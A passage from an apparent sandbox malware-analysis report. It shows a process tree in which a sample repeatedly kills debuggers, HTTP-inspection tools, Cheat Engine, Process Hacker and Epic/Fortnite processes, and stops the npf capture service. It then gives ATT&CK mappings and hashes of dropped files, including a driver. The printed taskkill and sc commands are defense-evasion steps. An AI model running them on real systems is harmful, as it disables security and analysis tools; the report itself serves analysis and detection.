  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4952
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4572
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4964
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1204
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3132
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4196
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2804
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2060
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3160
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:208
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:236
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2472
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2016
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2292
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3268
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1856
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3596
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2340
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3828

C:\Windows\system32\taskkill.exe
taskkill /f /im EpicGamesLauncher.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2952

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2656

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Media\BW_Overlay_Handler.exe

Filesize
37KB

MD5
2838c9120aea6d9faac4b3e919bfa5a5

SHA1
84453ad645d21ac3de7aefd40f189f8e1aa85a48

SHA256
8a4f7dd54a0d8582e6e58f7741566999efc69a0693ce14a7627ee9c5c6e54dad

SHA512
0c93f6da7b6cb4af6cbb41be11b50736983e348bcdbba33fdd62065b369f12f7549002abf1bf84b0a061ab0a64aae9e3e8293315086e1c1eb45d312b840c13c0

Download Submit
C:\Windows\Media\BW_Overlay_Handler.exe

Filesize
37KB

MD5
2838c9120aea6d9faac4b3e919bfa5a5

SHA1
84453ad645d21ac3de7aefd40f189f8e1aa85a48

SHA256
8a4f7dd54a0d8582e6e58f7741566999efc69a0693ce14a7627ee9c5c6e54dad

SHA512
0c93f6da7b6cb4af6cbb41be11b50736983e348bcdbba33fdd62065b369f12f7549002abf1bf84b0a061ab0a64aae9e3e8293315086e1c1eb45d312b840c13c0

Download Submit
C:\Windows\Temp\iloveinjecteddd.sys

Filesize
6KB

MD5
e43800e2c3e125b5e974b24788655c7b

SHA1
8415e50d8dc20ae7c44160a36f23547dc3138fc4

SHA256
914f9cb73f41ed77465d67e2b1f1d9a2d34cd375fce6be97e4964fa11fdd0582

SHA512
389a853df8f328bb427ad27d84ddeb523be81800287cc73ee8783e108600f81115c93a82252c8d0d261a0a26e549bc9e2f7d06037983be06ea4ff39bf604f92d

Download Submit
C:\Windows\Temp\sexymapzz.exe

Filesize
134KB

MD5
f65f3d53a144d49f155460d847430b61

SHA1
91c83868e820d50738d05b4bca49678caeefac0b

SHA256
5bb331d8eea13963934e5fe00f182b597e1eaa9d0b40c42a78403c9bf614d1d3

SHA512
a38f059eab633785dd5bfc1290df5f0ad74abb6cade33ae1498cdb79286b1f9669f1994bd116906e923190597788d9a44e6c8ea14837f00eef249f10850ddfd2

Download Submit
C:\Windows\Temp\sexymapzz.exe

Filesize
134KB

MD5
f65f3d53a144d49f155460d847430b61

SHA1
91c83868e820d50738d05b4bca49678caeefac0b

SHA256
5bb331d8eea13963934e5fe00f182b597e1eaa9d0b40c42a78403c9bf614d1d3

SHA512
a38f059eab633785dd5bfc1290df5f0ad74abb6cade33ae1498cdb79286b1f9669f1994bd116906e923190597788d9a44e6c8ea14837f00eef249f10850ddfd2

Download Submit
memory/2872-133-0x00007FFAD43B0000-0x00007FFAD43B2000-memory.dmp

Filesize
8KB

Download
memory/2872-134-0x00007FFAD43C0000-0x00007FFAD43C2000-memory.dmp

Filesize
8KB

Download
memory/2872-135-0x00007FF670440000-0x00007FF670E0D000-memory.dmp

Filesize
9.8MB

Download